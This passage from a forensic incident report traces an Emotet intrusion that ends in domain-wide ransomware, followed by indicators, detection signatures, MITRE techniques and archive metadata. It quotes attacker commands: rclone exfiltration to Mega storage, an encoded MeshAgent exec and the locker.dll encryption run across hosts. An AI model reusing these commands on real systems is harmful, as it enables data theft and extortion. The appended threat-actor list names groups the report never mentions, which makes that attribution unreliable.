Tactical\r\nRMM on. Using this RMM agent they proceeded to install AnyDesk on the host. The following process activity\r\nwas observed from meshagent.exe.\r\nMeshAgent.exe -kvm1\r\n- Initiating Process File Name, column 6, row 12\r\n\"MeshAgent.exe\" -b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5j\r\nThe decoded base 64 content reveals commands for console access and connect actions.\r\nThis is then followed by the following process flow:\r\nOnce downloaded and installed, the threat actor initiated a connection to the AnyDesk host.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 28 of 38\n\nClient-ID: 752733537 (FPR: 27ac27e2c9ed)\r\nLogged in from 84.17.49.114:1249\r\nExfiltration\r\nAlso seen in our last report on Emotet, threat actors leveraged Rclone to exfiltrate data to Mega (Mega.nz) storage\r\nservices.\r\nrclone.exe copy \"\\\\SERVER.domain.name\\path\" mega:1 -q --ignore-existing --auto-confirm --multi-threa\r\nrclone.exe copy \"\\\\SERVER.domain.name\\path\" mega:2 -q --ignore-existing --auto-confirm --multi-threa\r\nFrom the rclone.conf file, the threat actors left the details of the remote account being used.\r\nBrerinit@tempmail.de\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 29 of 38\n\nWith the help of Netflow, we identified that at least ~250MB worth of data was exfiltrated out of the environment.\r\nImpact\r\nSpam Email\r\nDuring the first two days, Emotet sent outbound spam emails over SMTP:\r\nThe following is an example of the SMTP traffic for sending the email, along with an extracted EML that was sent\r\nwith an attached XLS:\r\nRansomware\r\nTowards the last day of the intrusion, the threat actor made their preparations to deploy ransomware to the domain.\r\nThey started by connecting to a new server via RDP from the server they just used Tactical RMM to deploy\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 30 of 38\n\nAnydesk. Once establishing the RDP connection, they deployed Powertool64.exe, likely to prevent intervention\r\nby any security tools and launched the software Don’t Sleep.\r\nDon’t Sleep has the capability to keep the computer from being shutdown and the user from being signed off. This\r\nwas likely done to ensure nothing will interfere with the propagation of the ransomware payload.\r\nFinally, with Don’t Sleep running, the threat actor executed a batch script named “1.bat“. The script invoked the\r\nmain ransomware payload, locker.dll, and passed a list of all the computers in the domain to the target parameter.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 31 of 38\n\nrundll32.exe locker.dll,run /TARGET=\\\\HOST1.DOMAIN.NAME\\C$ /TARGET=\\\\HOST2.DOMAIN.NAME\\C$ /TARGET=\\\\H\r\nThe executable began to encrypt all the targeted hosts in the environment and dropped a ransom note:\r\nREADME_TO_DECRYPT.html\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 32 of 38\n\nAfter the invocation of the ransomware payload, about a minute later, the threat actor launched Process Hacker.\r\nWe believe this was to monitor the execution of the ransomware payload.\r\nAll systems in the domain were encrypted and presented with a ransom message.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 33 of 38\n\nIndicators\r\nAtomic\r\nEmotet Deployment Domains\r\ndescontador[.]com[.]br\r\nwww.elaboro[.]pl\r\nel-energiaki[.]gr\r\ndrechslerstammtisch[.]de\r\ndhnconstrucciones[.]com[.]ar\r\ndilsrl[.]com\r\nEmotet C2 Servers\r\n103.159.224.46\r\n103.75.201.2\r\n119.193.124.41\r\n128.199.225.17\r\n131.100.24.231\r\n139.59.60.88\r\n144.217.88.125\r\n146.59.226.45\r\n149.56.131.28\r\n159.89.202.34\r\n165.22.211.113\r\n165.227.166.238\r\n178.128.82.218\r\n209.126.98.206\r\n213.32.75.32\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 34 of 38\n\n37.187.115.122\r\n45.226.53.34\r\n45.55.134.126\r\n46.55.222.11\r\n51.210.176.76\r\n51.254.140.238\r\n54.37.70.105\r\n82.223.82.69\r\n91.207.181.106\r\n92.114.18.20\r\n94.23.45.86\r\n96.125.171.165\r\nCobalt Strike\r\n139.60.161.167 (survefuz[.]com)\r\n139.60.160.18 (juanjik[.]com)\r\nTactical RMM Agent\r\napi.floppasoftware[.]com\r\nmesh.floppasoftware[.]com\r\n212.73.150.62\r\nComputed\r\nK-1 06.13.2022.lnk\r\nde7c4da78a6cbba096e32e5eecb00566\r\n02b4f495e9995cc2251c19cd9984763f52122951\r\n1bf9314ae67ab791932c43e6c64103b1b572a88035447dae781bffd21a1187ad\r\n17jun.exe\r\n0ea68856c4f56f4056502208e97e9033\r\nb80c987c8849bf7905ea8f283b79d98753e3c15a\r\n41e230134deca492704401ddf556ee2198ef6f32b868ec626d9aefbf268ab6b1\r\ndontsleep.exe\r\n50cc3a3bca96d7096c8118e838d9bc16\r\nb286b58ed32b6df4ecdb5df86d7d7d177bb7bfaf\r\nf8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee\r\nlocker.dll\r\nd2df4601c8d43e655163c0b292bc4cc9\r\nf6727d5d04f2728a3353fbd45d7b2cb19e98802c\r\n6424b4983f83f477a5da846a1dc3e2565b7a7d88ae3f084f3d3884c43aec5df6\r\nnetscan.exe\r\n27f7186499bc8d10e51d17d3d6697bc5\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 35 of 38\n\n52332ce16ee0c393b8eea6e71863ad41e3caeafd\r\n18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566\r\nrclone.exe\r\n22bbe1747933531e9c240e0db86268e2\r\nc2a8776e21403eb00b38bfccd36d1c03dffb009e\r\n53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc\r\nBehavioral\r\nThe threat actor delivered Emotet via a Emotet loader in the form of a LNK file responsible for dropp\r\nTactical RMM Agent was installed by the threat actor on a server to ensure remote access (17jun.exe)\r\nData was exfiltrated to Mega cloud service via Rclone (rclone.exe).\r\nNetwork mapping was performed using SoftPerfect Network Scanner (netscan.exe) followed by Quantum ran\r\nThe threat actor kept the remote desktop session alive by running a program to keep the session activ\r\nDetections\r\nNetwork\r\nThe DFIR Report Cobalt Strike 139.60.160.18\r\nThe DFIR Report Cobalt Strike 139.60.161.167\r\nET Threatview.io High Confidence Cobalt Strike C2 IP group 1\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET INFO Observed External IP Lookup Domain (icanhazip .com in TLS SNI)t\r\nET JA3 HASH - Possible Rclone Client Response (Mega Storage)\r\nET POLICY HTTP POST to MEGA Userstorage\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET CNC Feodo Tracker Reported CnC Server group 1\r\nET CNC Feodo Tracker Reported CnC Server group 14\r\nET CNC Feodo Tracker Reported CnC Server group 15\r\nET CNC Feodo Tracker Reported CnC Server group 17\r\nET CNC Feodo Tracker Reported CnC Server group 19\r\nET CNC Feodo Tracker Reported CnC Server group 2\r\nET CNC Feodo Tracker Reported CnC Server group 20\r\nET CNC Feodo Tracker Reported CnC Server group 21\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 36 of 38\n\nET CNC Feodo Tracker Reported CnC Server group 23\r\nET CNC Feodo Tracker Reported CnC Server group 24\r\nET CNC Feodo Tracker Reported CnC Server group 25\r\nET CNC Feodo Tracker Reported CnC Server group 3\r\nET CNC Feodo Tracker Reported CnC Server group 4\r\nET CNC Feodo Tracker Reported CnC Server group 5\r\nET CNC Feodo Tracker Reported CnC Server group 6\r\nET CNC Feodo Tracker Reported CnC Server group 7\r\nET CNC Feodo Tracker Reported CnC Server group 8\r\nET CNC Feodo Tracker Reported CnC Server group 9\r\nET MALWARE W32/Emotet CnC Beacon 3\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/proc_creation_win_emotet_child_process_spawn_pattern.yml\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/15184/15184.yar\r\nMITRE\r\nPowerShell – T1059.001\r\nProcess Injection – T1055\r\nFile Deletion – T1070.004\r\nLateral Tool Transfer – T1570\r\nValid Accounts – T1078\r\nService Execution – T1569.002\r\nSMB/Windows Admin Shares – T1021.002\r\nRemote System Discovery – T1018\r\nProcess Discovery – T1057\r\nRundll32 – T1218.011\r\nRegsvr32 – T1218.010\r\nDomain Account – T1087.002\r\nDomain Groups – T1069.002\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 37 of 38\n\nSystem Information Discovery – T1082\r\nData Encrypted for Impact – T1486\r\nNetwork Share Discovery – T1135\r\nData from Network Shared Drive – T1039\r\nWeb Protocols – T1071.001\r\nRemote Access Software – T1219\r\nExfiltration to Cloud Storage – T1567.002\r\nRemote Desktop Protocol – T1021.001\r\nMalicious File – T1204.002\r\nSpearphishing Attachment – T1566.001\r\nExploitation of Remote Services – T1210\r\nInternal case #15184\r\nSource: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 38 of 38", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/" ], "report_names": [ "emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4b076dcb-516e-42fb-9c8f-f153902cd5e9", "created_at": "2022-10-25T16:07:23.708745Z", "updated_at": "2026-04-10T02:00:04.720108Z", "deleted_at": null, "main_name": "Hidden Lynx", "aliases": [ "Aurora Panda", "Group 8", "Heart Typhoon", "Hidden Lynx", "Operation SMN" ], "source_name": "ETDA:Hidden Lynx", "tools": [ "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "BlackCoffee", "HiKit", "MCRAT.A", "Mdmbot.E", "Moudoor", "Naid", "PNGRAT", "Trojan.Naid", "ZoxPNG", "gresim" ], "source_id": "ETDA", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4", "created_at": "2023-01-06T13:46:38.269054Z", "updated_at": "2026-04-10T02:00:02.90356Z", "deleted_at": null, "main_name": "APT3", "aliases": [ "GOTHIC PANDA", "TG-0110", "Buckeye", "Group 6", "Boyusec", "BORON", "BRONZE MAYFAIR", "Red Sylvan", "Brocade Typhoon" ], "source_name": "MISPGALAXY:APT3", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a7aefdda-98f1-4790-a32d-14cc99de2d60", "created_at": "2023-01-06T13:46:38.281844Z", "updated_at": "2026-04-10T02:00:02.909711Z", "deleted_at": null, "main_name": "APT17", "aliases": [ "BRONZE KEYSTONE", "G0025", "Group 72", "G0001", "HELIUM", "Heart Typhoon", "Group 8", "AURORA PANDA", "Hidden Lynx", "Tailgater Team" ], "source_name": "MISPGALAXY:APT17", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28", "created_at": "2023-01-06T13:46:38.39927Z", "updated_at": "2026-04-10T02:00:02.958273Z", "deleted_at": null, "main_name": "ENERGETIC BEAR", "aliases": [ "BERSERK BEAR", "ALLANITE", "Group 24", "Koala Team", "G0035", "ATK6", "ITG15", "DYMALLOY", "TG-4192", "Crouching Yeti", "Havex", "IRON LIBERTY", "Blue Kraken", "Ghost Blizzard" ], "source_name": "MISPGALAXY:ENERGETIC BEAR", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "06f622cb-3a78-49cf-9a4c-a6007a69325f", "created_at": "2022-10-25T16:07:23.315239Z", "updated_at": "2026-04-10T02:00:04.537826Z", "deleted_at": null, "main_name": "APT 3", "aliases": [ "APT 3", "Boron", "Brocade Typhoon", "Bronze Mayfair", "Buckeye", "G0022", "Gothic Panda", "Group 6", "Operation Clandestine Fox", "Operation Clandestine Fox, Part Deux", "Operation Clandestine Wolf", "Operation Double Tap", "Red Sylvan", "TG-0110", "UPS Team" ], "source_name": "ETDA:APT 3", "tools": [ "APT3 Keylogger", "Agent.dhwf", "BKDR_HUPIGON", "Backdoor.APT.CookieCutter", "Badey", "Bemstour", "CookieCutter", "Destroy RAT", "DestroyRAT", "DoublePulsar", "EXL", "EternalBlue", "HTran", "HUC Packet Transmit Tool", "Hupigon", "Hupigon RAT", "Kaba", "Korplug", "LaZagne", "MFC Huner", "OSInfo", "Pirpi", "PlugX", "RedDelta", "RemoteCMD", "SHOTPUT", "Sogu", "TIGERPLUG", "TTCalc", "TVT", "Thoper", "Xamtrav", "remotecmd", "shareip", "w32times" ], "source_id": "ETDA", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434575, "ts_updated_at": 1775792289, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.pdf", "text": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.txt", "img": "https://archive.orkl.eu/a33062f301411b934bbbd17ce600b4e994063a8e.jpg" } }